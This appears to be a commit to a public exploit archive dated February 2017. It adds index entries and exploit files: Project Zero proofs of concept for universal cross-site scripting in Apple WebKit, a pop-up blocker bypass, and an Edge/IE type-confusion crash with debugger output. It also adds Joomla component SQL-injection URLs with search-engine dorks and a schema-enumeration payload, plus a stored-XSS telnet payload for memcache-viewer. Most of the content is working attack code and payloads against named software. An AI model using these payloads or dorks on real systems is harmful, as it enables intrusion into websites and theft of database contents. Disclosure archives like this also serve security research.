DB: 2017-02-25

12 new exploits Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Joomla! Component JooDatabase 3.1.0 - SQL Injection Joomla! Component JO Facebook Gallery 4.5 - SQL Injection Joomla! Component AJAX Search for K2 2.2 - SQL Injection Joomla! Component Community Surveys 4.3 - SQL Injection Joomla! Component Community Polls 4.5.0 - SQL Injection Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting Joomla! Component GPS Tools 4.0.1 - SQL Injection Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass Joomla! Component Community Quiz 4.3.5 - SQL Injection Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting memcache-viewer - Cross-Site Scripting
2017-02-25 05:01:19 +00:00 · 2017-02-25 05:01:19 +00:00 · 438afbcaf8
commit 438afbcaf8
parent 3710b90d25
14 changed files with 586 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5382,6 +5382,7 @@ id,file,description,date,author,platform,type,port
 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -37360,3 +37361,14 @@ id,file,description,date,author,platform,type,port
 41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
 41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
 41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
 41444,platforms/php/webapps/41444.txt,"Joomla! Component JooDatabase 3.1.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41445,platforms/php/webapps/41445.txt,"Joomla! Component JO Facebook Gallery 4.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41446,platforms/php/webapps/41446.txt,"Joomla! Component AJAX Search for K2 2.2 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41447,platforms/php/webapps/41447.txt,"Joomla! Component Community Surveys 4.3 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41448,platforms/php/webapps/41448.txt,"Joomla! Component Community Polls 4.5.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41449,platforms/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",macos,webapps,0
 41450,platforms/php/webapps/41450.txt,"Joomla! Component GPS Tools 4.0.1 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41451,platforms/multiple/webapps/41451.html,"Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass",2017-02-24,"Google Security Research",multiple,webapps,0
 41452,platforms/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
--- a/platforms/macos/webapps/41449.html
+++ b/platforms/macos/webapps/41449.html
@ -0,0 +1,111 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
 When the new page is loading, FrameLoader::clear is called to clear the old document and window.
 Here's a snippet of FrameLoader::clear.
 void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
 {
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
 }
 The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
 Tested on Safari 10.0.2(12602.3.12.0.1).
 -->
 <body>
 <script>
 /*
 Apple WebKit: UXSS via FrameLoader::clear
 When the new page is loading, FrameLoader::clear is called to clear the old document and window.
 Here's a snippet of FrameLoader::clear.
 void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
 {
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
 }
 The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
 Tested on Safari 10.0.2(12602.3.12.0.1).
 */
 "use strict";
 function log(txt) {
    //if (Array.isArray(txt))
    //    txt = Array.prototype.join.call(txt, ", ");
    let c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
 }
 function main() {
    let f = document.body.appendChild(document.createElement("iframe"));
    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    a.contentWindow.onunload = () => {
        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
        b.contentWindow.onunload = () => {
            f.src = "javascript:''";
            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
            c.contentWindow.onunload = () => {
                f.src = "javascript:''";
                let d = f.contentDocument.appendChild(document.createElement("iframe"));
                d.contentWindow.onunload = () => {
                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
                        alert(document.location);
                    } + ")") + "')), 0);";
                };
            };
        };
    };
    f.src = "https://abc.xyz/";
 }
 main();
 /*
 b JSC::globalFuncParseFloat
 */
 </script>
 </body>
--- a/platforms/multiple/webapps/41451.html
+++ b/platforms/multiple/webapps/41451.html
@ -0,0 +1,137 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050
 The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.
 Here's some snippets.
 RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
    DOMWindow& activeWindow, DOMWindow& firstWindow)
 {
    ...
    ---------------- (1) -----------------------
    if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
        // Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
        // Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
        if (frameName.isEmpty() || !m_frame->tree().find(frameName))
            return nullptr;
    }
    --------------------------------------------
    ...
    RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
    return result ? result->document()->domWindow() : nullptr;
 }
 RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
 {
    ...
    RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
    if (!newFrame)
        return nullptr;
    ...
 }
 RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
 {
    ASSERT(!features.dialog || request.frameName().isEmpty());
    created = false;
    ---------------- (2) -----------------------
    if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
        if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
            if (request.frameName() != "_self") {
                if (Page* page = frame->page())
                    page->chrome().focus();
            }
            return frame;
        }
    }
    --------------------------------------------
    <<<<<----------- failed to find the frame, creates a new one.
    ...
 }
 The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
 Let's look into |findFrameForNavigation|.
 Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
 {
    Frame* frame = m_frame.tree().find(name);
    // FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
    if (!activeDocument)
        activeDocument = m_frame.document();
    if (!activeDocument->canNavigate(frame))
        return nullptr;
    return frame;
 }
 bool Document::canNavigate(Frame* targetFrame)
 {
    ...
    if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
        if (targetFrame->tree().isDescendantOf(m_frame))
            return true;
        const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
        if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
            reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
        printNavigationErrorMessage(targetFrame, url(), reason);
        return false;
    }
    ...
    if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
        return true;
    ...
    return false;
 }
 There are two points to make |Document::canNavigate| return false.
 (1). Using a sandboxed iframe.
 <body>
 <iframe name="one"></iframe>
 <iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
 <script>
 function main() {
    two.eval('open("https://abc.xyz", "one");');
 }
 main()
 </script>
 </body>
 (2). Using a cross-origin iframe.
 -->
 <body>
 <iframe name="one"></iframe>
 <script>
 function main() {
    document.body.appendChild(document.createElement("iframe")).contentDocument.location =
        "data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>";
 }
 main()
 </script>
 </body>
 <!--
 Tested on Safari 10.0.2 (12602.3.12.0.1).
 -->
--- a/platforms/multiple/webapps/41453.html
+++ b/platforms/multiple/webapps/41453.html
@ -0,0 +1,55 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1057
 Here's a snippet of Frame::setDocument.
 void Frame::setDocument(RefPtr<Document>&& newDocument)
 {
    ASSERT(!newDocument || newDocument->frame() == this);
    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
        m_doc->prepareForDestruction();
    m_doc = newDocument.copyRef();
    ...
 }
 Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction| that fires unload event handlers. If we call |Frame::setDocument| with the new document |a|, and call |Frame::setDocument| again with the new document |b| in the unload event handler. Then |prepareForDestruction| will be never called on |b|, which means the frame will be never detached from |b|.
 PoC:
 -->
 "use strict";
 let f = document.documentElement.appendChild(document.createElement("iframe"));
 let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
 a.contentWindow.onunload = () => {
    f.src = "javascript:''";
    let b = f.contentDocument.appendChild(document.createElement("iframe"));
    b.contentWindow.onunload = () => {
        f.src = "javascript:''";
        let doc = f.contentDocument;
        f.onload = () => {
            f.onload = () => {
                f.onload = null;
                let s = doc.createElement("form");
                s.action = "javascript:alert(location)";
                s.submit();
            };
            f.src = "https://abc.xyz/";
        };
    };
 };
 f.src = "javascript:''";
 <!--
 Tested on Safari 10.0.2(12602.3.12.0.1).
 -->
--- a/platforms/php/webapps/41438.txt
+++ b/platforms/php/webapps/41438.txt
@ -1,7 +1,7 @@
 # Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
 # Date: 02/18/2017
 # Exploit Author: Hanley Shun
-# Vendor Homepage: https://github.com/hamkovic/
+# Vendor Homepage: https://wpcore.com/plugin/mail-masta
 # Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
 # Version: 1.0
 # Tested on: Kali Linux x64, Ubuntu 14.04 x64
--- a/platforms/php/webapps/41444.txt
+++ b/platforms/php/webapps/41444.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
 # Google Dork: inurl:index.php?option=com_joodb
 # Date: 24.02.2017
 # Vendor Homepage: https://feenders.de/
 # Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
 # Demo: https://joodb.feenders.de/db-example.html
 # Version: 3.1.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
 # http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
 # # # # #
--- a/platforms/php/webapps/41445.txt
+++ b/platforms/php/webapps/41445.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
 # Google Dork: inurl:index.php?option=com_jofacebookgallery
 # Date: 24.02.2017
 # Vendor Homepage: http://joomcore.com/joomla32/
 # Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
 # Demo: http://demo.joomcore.com/joomla32/
 # Version: 4.5
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
 # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
 # http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
 # # # # #
--- a/platforms/php/webapps/41446.txt
+++ b/platforms/php/webapps/41446.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
 # Google Dork: inurl:index.php?option=com_k2ajaxsearch
 # Date: 24.02.2017
 # Vendor Homepage: http://taleia.software/
 # Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
 # Demo: http://k2ajaxsearch.taleia.software/demo/
 # Version: 2.2
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
 # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
 # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
 # # # # #
--- a/platforms/php/webapps/41447.txt
+++ b/platforms/php/webapps/41447.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
 # Google Dork: inurl:index.php?option=com_communitysurveys
 # Date: 24.02.2017
 # Vendor Homepage: http://corejoomla.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
 # Demo: http://demo.corejoomla.com/surveys.html
 # Version: 4.3
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # index.php?option=com_communitysurveys&view=search
 # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
 # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
 # # # # #
--- a/platforms/php/webapps/41448.txt
+++ b/platforms/php/webapps/41448.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
 # Google Dork: inurl:index.php?option=com_communitypolls
 # Date: 24.02.2017
 # Vendor Homepage: http://corejoomla.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
 # Demo: http://demo.corejoomla.com/polls.html
 # Version: 4.5.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # index.php?option=com_communitypolls&view=search
 # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
 # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
 # # # # #
--- a/platforms/php/webapps/41450.txt
+++ b/platforms/php/webapps/41450.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection
 # Google Dork: inurl:index.php?option=com_gpstools
 # Date: 24.02.2017
 # Vendor Homepage: http://corejoomla.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/
 # Demo: http://demo.corejoomla.com/tracks.html
 # Version: 4.0.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # index.php?option=com_gpstools&view=search
 # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
 # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
 # # # # #
--- a/platforms/php/webapps/41452.txt
+++ b/platforms/php/webapps/41452.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection
 # Google Dork: inurl:index.php?option=com_communityquiz
 # Date: 24.02.2017
 # Vendor Homepage: http://corejoomla.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/
 # Demo: http://demo.corejoomla.com/quiz.html
 # Version: 4.3.5
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # index.php?option=com_communityquiz&view=search
 # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes
 # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
 # # # # #
--- a/platforms/php/webapps/41455.txt
+++ b/platforms/php/webapps/41455.txt
@ -0,0 +1,30 @@
 # Exploit Title: memcache-viewer - Stored XSS
 # Date: 2017-02-24
 # Exploit Author: HaHwul
 # Exploit Author Blog: www.hahwul.com
 # Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
 # Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
 # Version: Latest commit
 # Tested on: Debian [wheezy]
 ### Vulnerability 
 This program does not filter filtering on the special character when expressing the data from memcached on the web.
 When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.
 ### Example Attack code
 1. Send Payload(XSS Code) after Connecting to memcached server.
 #> telnet 127.0.0.1 11211
 Trying 127.0.0.1...
 Connected to 127.0.0.1.
 Escape character is '^]'.
 add hacked<script>alert(45)</script> 0 900 2
 45
 STORED
 2. Insert data through memcached related 3rd party application.
 ### Result
 Access index.php after memcache-viewer login
 DOM Area in index.php
 <td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>
--- a/platforms/windows/dos/41454.html
+++ b/platforms/windows/dos/41454.html
@ -0,0 +1,108 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
 PoC:
 -->
 <!-- saved from url=(0014)about:internet -->
 <style>
 .class1 { float: left; column-count: 5; }
 .class2 { column-span: all; columns: 1px; }
 table {border-spacing: 0px;}
 </style>
 <script>
 function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
 }
 </script>
 <body onload="setInterval(boom,100)">
 <table cellspacing="0">
 <tr class="class1">
 <th id="th1" colspan="5" width=0></th>
 <th class="class2" width=0><div class="class2"></div></th>
 <!--
 Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly.
 The PoC crashes in
 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement
 when reading from address 0000007800000070
 (5fc.8a4): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
 00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????
 With the following call stack:
 Child-SP          RetAddr           Call Site
 00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
 00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
 00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
 00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
 00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
 00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
 00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
 00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
 00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
 00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
 00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
 00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
 00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
 00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
 00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
 00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
 00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
 00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
 00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
 00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
 00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
 00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
 00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
 00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
 00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
 00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
 00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
 00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
 00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
 00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
 00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
 00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34
 And the following register values:
 rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
 rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
 rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
 r8=0000007916490ec0  r9=000000710e75b980 r10=00000079164a8f30
 r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
 r14=000000791648ec60 r15=0000007911ec9f50
 Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.
 Let's take a look at the code around the rip of the crash.
 00007ffe`8f330a51 488bcd          mov     rcx,rbp
 00007ffe`8f330a54 e8873c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
 00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????
 00007ffe`8f330a5d 743d            je      MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
 00007ffe`8f330a5f 488bcd          mov     rcx,rbp
